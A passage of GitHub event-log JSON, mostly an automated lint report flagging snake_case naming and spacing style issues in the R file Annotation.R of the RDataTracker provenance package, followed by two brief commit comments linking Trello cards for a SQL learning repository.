snake_case.**\n```r\n​.ddg.create.function.block <- function(func.definition) {\n                                       ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:674:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L674) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:677:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L677) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:680:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L680) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.body <- call(\"{\", func.body)\n  ^~~~~~~~~~~~~\n```\n[R/Annotation.R:689:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L689) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.conditional.statement <- function(func.definition, func.name) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:689:44:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L689) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.conditional.statement <- function(func.definition, func.name) {\n                                           ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:689:61:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L689) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.conditional.statement <- function(func.definition, func.name) {\n                                                            ^~~~~~~~~\n```\n[R/Annotation.R:691:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L691) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:694:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L694) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:702:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L702) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.body.txt <-\n  ^~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:709:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L709) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.expr <- parse(text=new.func.body.txt)\n  ^~~~~~~~~~~~~\n```\n[R/Annotation.R:710:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L710) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.body <- new.func.expr[[1]]\n  ^~~~~~~~~~~~~\n```\n[R/Annotation.R:722:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L722) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.insert.ddg.function <- function(func.definition) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:722:38:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L722) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.insert.ddg.function <- function(func.definition) {\n                                     ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:724:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L724) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:727:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L727) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:734:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L734) *style:* **Variable or function name should be snake_case.**\n```r\n​  inserted.statement <- call(\"ddg.function\")\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:735:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L735) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.statements.txt <- c(as.list(\"{\"), inserted.statement, \n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:755:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L755) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.return.parameters <- function(block, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:755:48:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L755) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.return.parameters <- function(block, parsed.stmts) {\n                                               ^~~~~~~~~~~~\n```\n[R/Annotation.R:774:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L774) *style:* **Variable or function name should be snake_case.**\n```r\n​          ret.params <- \"\"\n          ^~~~~~~~~~\n```\n[R/Annotation.R:776:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L776) *style:* **Variable or function name should be snake_case.**\n```r\n​          ret.params <- statement[[2]]\n          ^~~~~~~~~~\n```\n[R/Annotation.R:788:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L788) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts[[i-2]]\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:793:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L793) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:800:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L800) *style:* **Variable or function name should be snake_case.**\n```r\n​          ret.params <- .ddg.wrap.return.parameters(ret.params, parsed.stmt)\n          ^~~~~~~~~~\n```\n[R/Annotation.R:803:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L803) *style:* **Variable or function name should be snake_case.**\n```r\n​        new.ret.params <- .ddg.create.ddg.return.call(ret.params, parsed.stmt)\n        ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:804:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L804) *style:* **Variable or function name should be snake_case.**\n```r\n​        new.statement <- call(\"return\", new.ret.params)\n        ^~~~~~~~~~~~~\n```\n[R/Annotation.R:814:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L814) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts[[i-2]]\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:819:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L819) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:846:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L846) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.all.return.parameters <- function(func.definition, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:846:45:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L846) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.all.return.parameters <- function(func.definition, parsed.stmts) {\n                                            ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:846:62:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L846) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.all.return.parameters <- function(func.definition, parsed.stmts) {\n                                                             ^~~~~~~~~~~~\n```\n[R/Annotation.R:848:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L848) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:851:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L851) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:873:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L873) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.find.last.statement <- function (func.definition) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:873:38:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L873) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​.ddg.find.last.statement <- function (func.definition) {\n                                     ^\n```\n[R/Annotation.R:873:39:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L873) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.find.last.statement <- function (func.definition) {\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:875:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L875) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:894:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L894) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.last.line <- function(func.definition, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:894:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L894) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.last.line <- function(func.definition, parsed.stmts) {\n                                ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:894:50:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L894) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.last.line <- function(func.definition, parsed.stmts) {\n                                                 ^~~~~~~~~~~~\n```\n[R/Annotation.R:896:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L896) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:899:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L899) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:905:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L905) *style:* **Variable or function name should be snake_case.**\n```r\n​  last.statement <- block[[pos]]\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:906:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L906) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.stmt <- parsed.stmts[[length(parsed.stmts)]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:908:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L908) *style:* **Variable or function name should be snake_case.**\n```r\n​  wrapped.statement <- .ddg.create.ddg.return.call(last.statement, parsed.stmt)\n  ^~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:922:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L922) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:922:41:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L922) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n                                        ^\n```\n[R/Annotation.R:922:42:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L922) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n                                         ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:922:58:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L922) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n                                                         ^~~~~~~~~~~\n```\n[R/Annotation.R:931:12:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L931) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", last.statement, function() parsed.stmt))\n           ^\n```\n[R/Annotation.R:931:18:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L931) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", last.statement, function() parsed.stmt))\n                 ^\n```\n[R/Annotation.R:941:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L941) *style:* **Variable or function name should be snake_case.**\n```r\n​    new.statement <- .ddg.create.ddg.eval.call(last.statement, parsed.stmt)\n    ^~~~~~~~~~~~~\n```\n[R/Annotation.R:942:12:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L942) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", new.statement, function() parsed.stmt))\n           ^\n```\n[R/Annotation.R:942:18:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L942) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", new.statement, function() parsed.stmt))\n                 ^\n```\n[R/Annotation.R:957:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L957) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.with.ddg.eval <- function(func.definition, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:957:37:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L957) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.with.ddg.eval <- function(func.definition, parsed.stmts) {\n                                    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:957:54:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L957) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.with.ddg.eval <- function(func.definition, parsed.stmts) {\n                                                     ^~~~~~~~~~~~\n```\n[R/Annotation.R:959:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L959) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:962:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L962) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:976:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L976) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.stmt <- parsed.stmts[[i-2]]\n      ^~~~~~~~~~~\n```\n[R/Annotation.R:977:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L977) *style:* **Variable or function name should be snake_case.**\n```r\n​      new.statement <- .ddg.create.ddg.eval.call(statement, parsed.stmt)\n      ^~~~~~~~~~~~~\n```\n[R/Annotation.R:989:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L989) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.if.statement <- function(command) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:992:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L992) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- deparse(command@parsed[[1]])\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:997:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L997) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command <- command@parsed[[1]]\n    ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:998:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L998) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.stmts <- command@contained\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:1004:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1004) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- vector()\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1013:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1013) *style:* **Variable or function name should be snake_case.**\n```r\n​      block.stmts<- list ()\n      ^~~~~~~~~~~\n```\n[R/Annotation.R:1013:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1013) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​      block.stmts<- list ()\n                         ^\n```\n[R/Annotation.R:1015:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1015) *style:* **Variable or function name should be snake_case.**\n```r\n​        block.stmts <- c(block.stmts, parsed.stmts[[i+ptr]])\n        ^~~~~~~~~~~\n```\n[R/Annotation.R:1030:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1030) *style:* **Variable or function name should be snake_case.**\n```r\n​        statement.txt <- paste(c(paste(\"if (\", cond, \")\", sep=\"\"), \n        ^~~~~~~~~~~~~\n```\n[R/Annotation.R:1033:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1033) *style:* **Variable or function name should be snake_case.**\n```r\n​        statement.txt <- paste(c(paste(\"} else if (\", cond, \")\", sep=\"\"), \n        ^~~~~~~~~~~~~\n```\n[R/Annotation.R:1040:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1040) *style:* **Variable or function name should be snake_case.**\n```r\n​        parsed.command.txt <- parsed.command.txt[c(1:last)]\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1042:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1042) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.command.txt <- append(parsed.command.txt, statement.txt)\n      ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1046:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1046) *style:* **Variable or function name should be snake_case.**\n```r\n​        final.else <- TRUE\n        ^~~~~~~~~~\n```\n[R/Annotation.R:1048:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1048) *style:* **Variable or function name should be snake_case.**\n```r\n​        final.else <- FALSE\n        ^~~~~~~~~~\n```\n[R/Annotation.R:1063:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1063) *style:* **Variable or function name should be snake_case.**\n```r\n​      block.stmts <- list()\n      ^~~~~~~~~~~\n```\n[R/Annotation.R:1065:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1065) *style:* **Variable or function name should be snake_case.**\n```r\n​        block.stmts <- c(block.stmts, parsed.stmts[[i+ptr]])\n        ^~~~~~~~~~~\n```\n[R/Annotation.R:1075:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1075) *style:* **Variable or function name should be snake_case.**\n```r\n​      statement.txt <- paste(c(paste(\"} else\", sep=\"\"), deparse(block), collapse=\"\"))\n      ^~~~~~~~~~~~~\n```\n[R/Annotation.R:1079:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1079) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.command.txt <- parsed.command.txt[c(1:last)]\n      ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1080:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1080) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.command.txt <- append(parsed.command.txt, statement.txt)\n      ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1084:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1084) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <- \n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1086:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1086) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <-\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1102:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1102) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.loop.statement <- function(command, loop.type) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1102:51:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1102) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.loop.statement <- function(command, loop.type) {\n                                                  ^~~~~~~~~\n```\n[R/Annotation.R:1106:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1106) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- deparse(command@parsed[[1]])\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1112:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1112) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command <- command@parsed[[1]]\n    ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:1115:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1115) *style:* **Variable or function name should be snake_case.**\n```r\n​    ddg.loop.num <- .ddg.add.loop()\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:1133:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1133) *style:* **Variable or function name should be snake_case.**\n```r\n​    annotated.block <- .ddg.wrap.block.with.ddg.eval(block, command@contained)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1137:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1137) *style:* **Variable or function name should be snake_case.**\n```r\n​      index.var <- parsed.command[[2]]\n      ^~~~~~~~~\n```\n[R/Annotation.R:1138:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1138) *style:* **Variable or function name should be snake_case.**\n```r\n​      annotated.block <- .ddg.insert.ddg.forloop(annotated.block, index.var)\n      ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1142:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1142) *style:* **Variable or function name should be snake_case.**\n```r\n​    annotated.block <- .ddg.add.block.start.finish(annotated.block, \n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1149:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1149) *style:* **Variable or function name should be snake_case.**\n```r\n​    block.txt <- deparse(block)\n    ^~~~~~~~~\n```\n[R/Annotation.R:1150:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1150) *style:* **Variable or function name should be snake_case.**\n```r\n​    annotated.block.txt <- deparse(annotated.block)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1154:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1154) *style:* **Variable or function name should be snake_case.**\n```r\n​      firstLine <- paste(\"for (\", deparse(parsed.command[[2]]), \" in \", \n      ^~~~~~~~~\n```\n[R/Annotation.R:1158:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1158) *style:* **Variable or function name should be snake_case.**\n```r\n​      firstLine <- paste(\"while (\", deparse(parsed.command[[2]]), \") {\", sep=\"\")\n      ^~~~~~~~~\n```\n[R/Annotation.R:1161:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L1161) *style:* **Variable or function name should be snake_case.**\n```r\n​      firstLine <- paste(\"repeat {\", sep=\"\")\n      ^~~~~~~~~\n```\n"}},"created_at":"2018-07-30T21:38:14Z"}
{"id":"8040443850","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/sql-lab"},"payload":{"comment":{"id":29894326,"position":null,"line":null,"path":null,"commit_id":"020d97968897d3a716d4bf401f37121c111bb154","created_at":"2018-07-30T21:39:14Z","updated_at":"2018-07-30T21:39:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create a Database](https://trello.com/c/vpd4gM8p/1-create-a-database)"}},"created_at":"2018-07-30T21:39:14Z"}
{"id":"8040444588","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/sql-lab"},"payload":{"comment":{"id":29894330,"position":null,"line":null,"path":null,"commit_id":"020d97968897d3a716d4bf401f37121c111bb154","created_at":"2018-07-30T21:39:25Z","updated_at":"2018-07-30T21:39:25Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Write Basic Queries](https://trello.com/c/TATkpEwd/2-write-basic-queries)"}},"created_at":"2018-07-30T21:39:25Z"}
